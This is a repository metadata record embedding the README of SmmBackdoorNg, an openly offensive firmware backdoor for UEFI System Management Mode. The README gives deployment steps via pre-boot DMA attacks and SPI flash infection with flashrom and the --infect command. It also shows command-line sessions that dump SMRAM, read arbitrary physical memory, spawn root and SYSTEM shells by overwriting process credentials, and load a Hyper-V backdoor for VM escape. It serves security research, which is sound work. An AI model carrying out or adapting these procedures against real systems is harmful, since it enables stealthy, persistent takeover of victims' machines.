{"id":21510116,"url":"https://github.com/cr4sh/smmbackdoorng","last_synced_at":"2025-04-07T10:23:36.908Z","repository":{"id":198755898,"uuid":"701466023","full_name":"Cr4sh/SmmBackdoorNg","owner":"Cr4sh","description":"Updated version of System Management Mode backdoor for UEFI based platforms: old dog, new tricks","archived":false,"fork":false,"pushed_at":"2023-11-03T15:28:12.000Z","size":1824,"stargazers_count":308,"open_issues_count":0,"forks_count":51,"subscribers_count":11,"default_branch":"main","last_synced_at":"2025-03-31T08:12:18.490Z","etag":null,"topics":["backdoor","boot","exploit","firmware","intel","malware","smm","uefi"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cr4sh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-06T17:36:40.000Z","updated_at":"2025-03-30T07:18:29.000Z","dependencies_parsed_at":"2023-10-14T23:53:51.879Z","dependency_job_id":"15ea5bef-ab1a-4239-a2b4-6e8b95bb34b8","html_url":"https://github.com/Cr4sh/SmmBackdoorNg","commit_stats":null,"previous_names":["cr4sh/smmbackdoorng"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FSmmBackdoorNg","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FSmmBackdoorNg/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FSmmBackdoorNg/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FSmmBackdoorNg/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cr4sh","download_url":"https://codeload.github.com/Cr4sh/SmmBackdoorNg/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247632728,"owners_count":20970208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","boot","exploit","firmware","intel","malware","smm","uefi"],"created_at":"2024-11-23T21:46:41.926Z","updated_at":"2025-04-07T10:23:36.885Z","avatar_url":"https://github.com/Cr4sh.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# SMM Backdoor Next Gen\n\n[General information](#general-information)  \n[Contents](#contents)  \n[Backdoor usage](#backdoor-usage)  \n[Deploying the backdoor using firmware flash image infection](#deploying-the-backdoor-using-firmware-flash-image-infection)  \n[Using together with Hyper-V Backdoor](#using-together-with-hyper-v-backdoor)  \n[Building from the source code](#building-from-the-source-code)  \n\n## General information\n\nThis version of System Management Mode backdoor for UEFI based platforms was heavily inspired by [my previous project](http://blog.cr4.sh/2015/07/building-reliable-smm-backdoor-for-uefi.html) (check [its GitHub repository](https://github.com/Cr4sh/SmmBackdoor)) but introducing few key changes in order to make it more up to date:\n\n * In addition to the usual firmware flash image infection method as described in the article, new SMM backdoor also can be deployed with pre-boot DMA attack using [PCI Express DIY hacking toolkit](https://github.com/Cr4sh/s6_pcie_microblaze) (see [uefi_backdoor_simple.py](https://github.com/Cr4sh/s6_pcie_microblaze/blob/master/python/uefi_backdoor_simple.py) program usage for more details) and industry-wide EFI SMM Core [vulnerability exploitation](https://github.com/Cr4sh/SmmBackdoorNg/blob/main/src/exploit.c) to perform DXE to SMM execution transition. The vulnerability [INTEL-SA-00144](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00144.html) was discovered by myself and reported to Intel PSIRT [years ago](https://twitter.com/d_olex/status/877718172366798848), but it still remains not patched on many products that using old EDK2 derived firmware code, including whole [AMI Aptio](https://www.ami.com/aptio/) family. Latest generations of Intel machines are likely not vulnerable to this attack.\n\n * Client program `smm_backdoor.py` supports Windows and Linux systems and can interact with SMM backdoor using SW SMI (requires high privileges and [chipsec](https://github.com/chipsec/chipsec) installed) or APIC periodic timer method that can work with any privileges level.\n\n * There's `smm_backdoor_privesc_linux.py` and `smm_backdoor_privesc_win.py` test client programs for SMM backdoor that demonstrating local privileges escalation under Windows and Linux by using its API provided by `smm_backdoor.py` library.\n\n * SMM backdoor is fully virtualization-aware now, its library and client programs can work as expected inside Windows or Linux virtual machines running on the infected host system.\n\n * SMM backdoor also can be used to load [my Hyper-V backdoor](https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv) (which is also part of PCI Express DIY hacking toolkit) into the currently running hypervisor during RT phase and perform guest to host VM escape attacks. Test client program `smm_backdoor_hyper_v.py` is used for integration with Hyper-V backdoor and its deployment.\n\n\n## Contents\n\nThe project consists from the following files and directories:\n\n * `src/` \u0026minus; Source code directory of UEFI DXE driver that implements SMM backdoor functionality along with software part of the exploit.\n\n * `config.h` \u0026minus; C header file with backdoor UEFI driver project configuration.\n\n * `interface.h` \u0026minus; C header file with SMM backdoor program interface definitions.\n\n * `SmmBackdoorNg.inf` \u0026minus; EDK II project configuration file for backdoor UEFI driver.\n\n * `SmmBackdoorNg_X64.efi` \u0026minus; Compiled binary of backdoor UEFI driver.\n\n * `SmmBackdoorNg_X64.pdb` \u0026minus; Debug symbols for the binary.\n\n * `smm_backdoor.py` \u0026minus; Backdoor client program, also used to infect PE images of UEFI SMM drivers.\n\n * `smm_backdoor_privesc_linux.py` \u0026minus; Backdoor client program with Linux local privileges escalation demo.\n\n * `smm_backdoor_privesc_windows.py` \u0026minus; Backdoor client program with Windows local privileges escalation demo.\n\n * `smm_backdoor_hyper_v.py` \u0026minus; Backdoor client program used for Hyper-V backdoor deployment.\n\n\n## Backdoor usage\n\nProject documentation is incomplete at this moment, but here's some command line examples.\n\nDeploying SMM backdoor UEFI driver with PCI Express DIY hacking toolkit using [pre-boot DMA attack](https://github.com/Cr4sh/s6_pcie_microblaze#practical-dma-attacks), DXE to SMM execution transition exploit mentioned above will be started automatically once backdoor driver will be loaded:\n\n```\n# python2 uefi_backdoor_simple.py --driver SmmBackdoorNg_X64.efi\n[+] Using UEFI system table hook injection method\n[+] Reading DXE phase payload from SmmBackdoorNg_X64.efi\n[+] Waiting for PCI-E link...\n[!] PCI-E endpoint is not configured by root complex yet\n[!] PCI-E endpoint is not configured by root complex yet\n[!] Bad MRd TLP completion received\n[+] PCI-E link with target is up\n[+] Device address is 01:00.0\n[+] Looking for DXE driver PE image...\n[+] PE image is at 0x7a070000\n[+] EFI_SYSTEM_TABLE is at 0x7a03e018\n[+] EFI_BOOT_SERVICES is at 0x7a38fa30\n[+] EFI_BOOT_SERVICES.LocateProtocol() address is 0x7a3987b4\nBackdoor image size is 0x49a0\nBackdoor entry RVA is 0x20fc\nPlanting DXE stage driver at 0xc0000...\nHooking LocateProtocol(): 0x7a3987b4 -\u003e 0x000c20fc\n1.852231 sec.\n[+] DXE driver was planted, waiting for backdoor init...\n[+] DXE driver was executed\n[+] DONE\n```\n\nIn case if you're going to deploy SMM backdoor with PCI Express DIY hacking toolkit \u0026minus; I would recommend to get used [Xilinx ZC706](https://www.xilinx.com/products/boards-and-kits/ek-z7-zc706-g.html) from e-Bay rather than [older SP605](https://www.xilinx.com/products/boards-and-kits/ek-s6-sp605-g.html) evaluation kit, since this board has [better design](https://github.com/Cr4sh/zc_pcie_dma), can perform DMA attacks faster and its [development tools](https://www.xilinx.com/products/design-tools/vivado.html) are more suitable for modern day use.\n\nTo deploy SMM backdoor you also can use my [Pico DMA project](https://github.com/Cr4sh/pico_dma) \u0026minus; fully autonomous pre-boot DMA attack hardware implant for M.2 slot based on PicoEVB development board that can run arbitrary UEFI DXE drivers as payload.\n\nIn addition, you also can deploy the backdoor using [firmware flash image infection](#deploying-the-backdoor-using-firmware-flash-image-infection) described below in the next section.\n\nBasic use of SMM backdoor `smm_backdoor.py` client program to display backdoor debug messages buffer once it was loaded and system has been booted:\n\n```\n# python2 smm_backdoor.py --debug\n****** Chipsec Linux Kernel module is licensed under GPL 2.0\n[+] Obtaining backdoor debug information...\n[+] Debug output buffer physical address is 0x79da4000\n\n00000001 - backdoor.c(1573) : ******************************\n00000002 - backdoor.c(1574) :\n00000003 - backdoor.c(1575) :   SMM backdoor loaded\n00000004 - backdoor.c(1576) :\n00000005 - backdoor.c(1577) : ******************************\n00000006 - backdoor.c(1589) : Resident code base address is 0x79d9f000\n00000007 - backdoor.c(1502) : BackdoorResidentDma()\n00000008 - backdoor.c(313) : Protocol notify handler is at 0x79d9f364\n00000009 - backdoor.c(1423) : SMM access 2 protocol is at 0x778fe650\n00000010 - backdoor.c(1424) : Available SMRAM regions:\n00000011 - backdoor.c(1434) :  * 0x7b000000:0x7b000fff\n00000012 - backdoor.c(1434) :  * 0x7b001000:0x7b7fffff\n00000013 - exploit.c(242) : SMM communicate header is at 0x79da2ae0\n00000014 - exploit.c(256) : Executing SMM callback...\n00000015 - backdoor.c(1215) : Running in SMM\n00000016 - backdoor.c(1216) : SMM system table is at 0x7b7f84c0\n00000017 - backdoor.c(1177) : Max. SW SMI value is 0xff\n00000018 - backdoor.c(1188) : SW SMI handler is at 0x7b5effb8\n00000019 - exploit.c(271) : Communicate(): status = 0xe, size = 0x19\n00000020 - exploit.c(277) : Exploit(): Exploitation success\n00000021 - backdoor.c(409) : SmmCtlHandle(): Periodic timer SW SMI was enabled\n00000022 - backdoor.c(1328) : new_SetVirtualAddressMap()\n00000023 - backdoor.c(1369) : New address of the resident image is 0xfffffffeec79f000\n```\n\nCheck for responding backdoor and show basic information about System Management Mode execution environment:\n\n```\n# python2 smm_backdoor.py --use-timer --test\n[+] Checking if SMM backdoor is present...\n[+] Obtaining information...\n\n  CR0 = 0x80000033\n  CR3 = 0x7b7b1000\n SMST = 0x7b7f84c0\n\n[+] SMRAM regions:\n\n * 0x7b000000:7b000fff\n * 0x7b001000:7b7fffff\n```\n\nExample of reading of arbitrary physical memory, beginning of SMRAM region in this case:\n\n```\n# python2 smm_backdoor.py --use-timer --read-phys 0x7b000000 --size 0x80\n7b000000: 53 4d 4d 53 33 5f 36 34 90 c5 7d 7b 00 00 00 00 | SMMS3.64........\n7b000010: 00 60 7a 7b 00 00 00 00 00 80 00 00 00 00 00 00 | ..z.............\n7b000020: 33 00 00 80 00 00 00 00 00 10 7b 7b 00 00 00 00 | 3...............\n7b000030: 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | h...............\n7b000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\n7b000050: 00 00 00 00 00 00 00 00 00 00 c0 84 7f 7b 00 00 | ................\n7b000060: 00 00 e1 13 e0 12 e0 12 f0 12 e1 13 f1 03 f1 03 | ................\n7b000070: f1 02 e1 13 e0 12 e0 12 e0 02 e1 13 f1 03 f1 03 | ................\n```\n\nTo read and dump entire SMRAM regions into the file you can use the following command:\n\n```\n# python2 smm_backdoor.py --dump-smram\n****** Chipsec Linux Kernel module is licensed under GPL 2.0\n[+] Dumping SMRAM regions, this may take a while...\n[+] Creating SMRAM_dump_7b000000_7b7fffff.bin\n```\n\nExample of `smm_backdoor_privesc_linux.py` client program usage for local privileges escalation under the Linux operating system:\n\n```\n$ python2 smm_backdoor_privesc_linux.py\n[+] Initializing SMM backdoor client...\n[+] User CR3 = 0x271b14000\n[+] LSTAR = 0xffffffff81e00010\n[+] do_syscall_64() is at 0xffffffff810025c0\n[+] sys_call_table() is at 0xffffffff822001a0\n[+] sys_getuid() is at 0xffffffff81073c10\n[+] task_struct offset is 0x14d40\n[+] cred offset is 0x628\n[+] IA32_KERNEL_GS_BASE = 0xffff888277a00000\n[+] Process task_struct is at 0xffff88827148db00\n[+] Process cred is at 0xffff88827289d000\n[+] Overwriting process credentials...\n[+] Done, spawning root shell...\n\nsh-4.4# id\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)\n```\n\nExample of `smm_backdoor_privesc_win.py` client program usage for local privileges escalation under the Windows operating system:\n\n```\nPS C:\\\u003e python2 smm_backdoor_privesc_win.py\n[+] Initializing SMM backdoor client...\n[+] NT version is 10.0.19041\n[+] _EPROCESS Token offset is 0x04b8\n[+] _KPCR KernelDirectoryTableBase offset is 0x9000\n[+] _KPCR structure is at 0xfffff8005f486000\n[+] KVA shadow is disabled or not present\n[+] Kernel CR3 value is 0x0000000141491000\n[+] Token object address is 0xffffcd0ef752c060\n[+] Present privileges: 0x1e73deff20 -\u003e 0x1ff2ffffbc\n[+] Enabled privileges: 0x60900000 -\u003e 0x1ff2ffffbc\n[+] Current process object address is 0xffffa60de954a080\n[+] System process object address is 0xffffa60de12dd080\n[+] Overwriting process token...\n[+] Done, spawning SYSTEM shell...\n\nMicrosoft Windows [Version 10.0.19041.208]\n(c) 2020 Microsoft Corporation. All rights reserved.\n\nC:\\\u003e whoami\nnt authority\\system\n```\n\n## Deploying the backdoor using firmware flash image infection\n\nTo infect platform firmware stored in the flash chip on the motherboard with SMM backdoor you will need some SPI flash programmer, I prefer to use cheap and widely available [FT2232H Mini Module](https://www.ftdichip.com/Support/Documents/DataSheets/Modules/DS_FT2232H_Mini_Module.pdf) from FTDI. Also, there's a [board called Tigrad](https://www.crowdsupply.com/securinghw/tigard) \u0026minus; multi-protocol, multi-voltage tool for hardware hacking that can work as SPI flash programmer. In addition to the programmer you also will need the following tools:\n\n * [UEFITool](https://github.com/LongSoft/UEFITool/releases/tag/0.28.0) utility to parse and edit UEFI flash images\n * [Flashrom](https://github.com/flashrom/flashrom/releases/tag/v1.2) utility to work with SPI flash programmer\n * SOIC8 [test clip](https://www.sparkfun.com/products/13153) or [probe hook](https://www.sparkfun.com/products/9741) clips kit to connect programmer to the flash chip without its de-soldering\n\nFirst of all, you have to disassemble the machine and locate SPI flash chip with platform firmware. Usually, it's [W25Q64](https://www.winbond.com/resource-files/w25q64fv%20revq%2006142016.pdf) or [W25Q128](https://www.winbond.com/resource-files/w25q128fv_revhh1_100913_website1.pdf) Windbond NOR flash in SOIC8 package. Then you have to connect the chip to the FT2232H Mini Module. It’s more convenient to use SOIC8 test clip than probe hook clips, but very often there’s not enough free space around the chip to place test clip. \n\nIn case if you happen to find WSON8 packaged chip on you board instead of usual SOIC8 \u0026minus; you can either de-solder it or use some sort of DIY [spring-loaded pogo pin](https://mouser.com/c/?q=pogo%20pin) test probe like this one to tap its pads:\n\n\u003cimg src=\"https://raw.githubusercontent.com/Cr4sh/SmmBackdoorNg/master/docs/images/spi_probe.jpg\" width=\"424\"\u003e\n\nFlash chip must be connected to the channel A of FT2232 Mini Module by the following scheme:\n\n\u003cimg src=\"https://raw.githubusercontent.com/Cr4sh/SmmBackdoorNg/master/docs/images/spi_wiring.png\" width=\"542\"\u003e\n\nNow you can read flash chip contents using Flashrom:\n\n```\n# flashrom -p ft2232_spi:type=2232H,port=A –r firmware.bin\n```\n\nAfter that you need to open dumped firmware in UEFITool, locate arbitrary UEFI SMM driver to infect and extract its PE32 image section from the firmware image:\n\n\u003cimg src=\"https://raw.githubusercontent.com/Cr4sh/SmmBackdoorNg/master/docs/images/uefi_tool.png\" width=\"701\"\u003e\n\nFor example, I picked `NvramSmm` UEFI SMM driver responsible for NVRAM access as pretty much suitable one. Then you can infect extracted driver with SMM backdoor using `--infect` command line option of `smm_backkdoor.py` program:\n\n```\n# python2 smm_backkdoor.py --infect NvramSmm.bin --output NvramSmm_infected.bin --payload SmmBackdoorNg_X64.efi\n```\n\nAfter that you have to replace original driver image with `NvramSmm_infected.bin` one in UEFITool, save resulting firmware image and flash it back into the chip:\n\n```\n# flashrom -p ft2232_spi:type=2232H,port=A –w firmware_infected.bin\n```\n\n## Using together with Hyper-V Backdoor\n\nOnce you have SMM backdoor loaded, as it shown above, you can use its capabilities to load Hyper-V backdoor during runtime phase with appropriate client program running inside arbitrary guest or host Hyper-V partition. \n\nTo do that you need to save `backdoor.bin` file [form Hyper-V backdoor repository](https://github.com/Cr4sh/s6_pcie_microblaze/blob/master/python/payloads/DmaBackdoorHv/backdoor.bin) as `hyper_v_backdoor.bin` in the same folder with `smm_backdoor_hyper_v.py` test client program and then just run it:\n\n```\nPS C:\\\u003e python2 smm_backdoor_hyper_v.py\n[+] Initializing SMM backdoor client...\n[+] Searching for VMCS structure in physical memory, this might take a while...\n\n Scan step: 0x0000000001000000\n Scan from: 0x0000000100000000\n   Scan to: 0x0000000200000000\n\n[+] Hypervisor VMCS structure was found\n\n Physical address: 0x0000000109341000\n         HOST_CR3: 0x0000000100103000\n         HOST_RIP: 0xfffff87b6963236a\n\n[+] HvlpLowMemoryStub() is at 0x0000000000002000\n[+] Host operating system version is 2004\n[+] VM exit handler is at 0xfffff87b6960e010\n[+] VM exit handler call is at 0xfffff87b69632440\n[+] 14 bytes jump is at 0xfffff87b69632466\n[+] Backdoor entry is at 0x0000000000002700\n[+] Backdoor code size is 860 bytes\n[+] Patching VM exit handler call...\n[+] Done, Hyper-V backdoor was successfully installed\n```\n\nIn case when `smm_backdoor_hyper_v.py` is unable to locate target VMCS region \u0026minus; you can override its default scanning options by specifying appropriate values in `--scan-from`, `--scan-to` and `--scan-step` command line arguments of the program. Since VMCS region location stage might take a while, you also can use `--verbose` option of the program to display operation progress information.\n\nAfter successful Hyper-V backdoor load you can run [its client program](https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv/backdoor_client/backdoor_client) to ensure that backdoor is up and responding:\n\n```\nPS C:\\\u003e .\\hyper_v_backdoor_client.exe 0\n[+] Running on CPU #0\n[+] Hyper-V backdoor is running\n\n      Hypervisor CR0: 0x80010031\n      Hypervisor CR3: 0x100103000\n      Hypervisor CR4: 0x422e0\n Hypervisor IDT base: 0xfffff87b69a00180 (limit = 0xffff)\n  Hypervisor GS base: 0xfffff87b69ba6000\n        VMCS address: 0x109341000\n     VM exit handler: 0xfffff87b6960e010\n       VM exit count: 0x86ed\n       VM call count: 0x2518\n```\n\nFor more information about Hyper-V backdoor client program and performing guest to host VM escape attacks on Windows targets you can [check usage examples](https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv#vm-escape-related-commands) in Hyper-V backdoor documentation. \n\n\n## Building from the source code\n\nTo compile SMM backdoor UEFI driver `SmmBackdoorNg_X64.efi` you need to have a Windows machine with [Visual Studio](https://visualstudio.microsoft.com/downloads/) and [EDK II source code](https://github.com/tianocore/edk2) installed.\n\nTo build project from the source code you need to perform the following steps:\n\n  1. Install Visual Studio and EDK II [following its setup instructions](https://github.com/tianocore/tianocore.github.io/wiki/Common-instructions).\n\n  2. Copy `SmmBackdoorNg` project directory into the EDK source code directory.\n\n  3. Edit `Conf/target.txt` file of EDK, set `ACTIVE_PLATFORM` value to `OvmfPkg/OvmfPkgX64.dsc` and `TOOL_CHAIN_TAG` in according to your installed version of Visual Studio.\n\n  4. Edit `OvmfPkg/OvmfPkgX64.dsc` file of EDK and add `SmmBackdoorNg/SmmBackdoorNg.inf` line at its end.\n\n  5. Open Visual Studio command prompt and change current directory to previously copied `SmmBackdoorNg` directory.\n\n  6. Execute `build` command to compile SMM backdoor UEFI driver.\n\n  7. Resulting image file will be created in appropriate sub-directory of `Build/OvmfX64/` EDK directory depending on used build target and Visual Studio version.\n\n\n## About\n\nDeveloped by:\u003cbr /\u003e\nDmytro Oleksiuk (aka Cr4sh)\n\n[cr4sh0@gmail.com](mailto:cr4sh0@gmail.com)\u003cbr /\u003e\n[http://blog.cr4.sh](http://blog.cr4.sh)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Fsmmbackdoorng","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcr4sh%2Fsmmbackdoorng","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Fsmmbackdoorng/lists"}